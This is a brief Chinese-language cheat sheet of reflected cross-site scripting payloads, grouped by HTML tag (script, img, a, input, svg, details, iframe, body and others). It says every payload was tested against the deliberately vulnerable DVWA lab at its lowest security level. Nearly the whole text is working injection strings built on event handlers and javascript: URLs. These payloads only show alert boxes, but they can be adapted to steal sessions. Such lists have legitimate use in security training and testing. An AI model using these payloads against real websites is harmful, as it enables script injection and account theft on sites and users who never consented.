所有標簽已經測試完并可以使用，測試環境：DVWA的反射型XSS，等級low

0x01 <script>標簽

<script>alert(2)</script>
<script>alert(2)</script//

0x02 <img>標簽

<img src="x" onerror=alert(1)>;
<img src="1" onerror=eval("alert('xss')")>;
<img src=1 onmouseover=alert('xss')>

0x03 <a>標簽

<a href="javascript:alert('xss')">aa</a>
<a href=javascript:eval(alert('xss'))>aa</a>

0x04 input標簽

<input value="" onclick=alert('xss') type="text">
<input name="name" value="" onmouseover=prompt('xss') bad="">

0x05 svg標簽

<svg onload=alert(1)>

0x06 details標簽

<details ontoggle="alert('xss');">
<details open ontoggle="alert('xss');">

0x07 select標簽

<select onfocus=alert(1)></select>
<select onfocus=alert(1) autofocus>

0x08 iframe標簽

<iframe onload=alert("xss");></iframe>

0x09 video標簽

<video><source onerror="alert(1)">

0x0A audio標簽

<audio src=x onerror=alert("xss");>

0x0B body標簽

<body/onload=alert("xss");>

0x0C textarea標簽

<textarea onfocus=alert("xss"); autofocus>

-------------------------------------------------------------
目前只有這么多，以后繼續加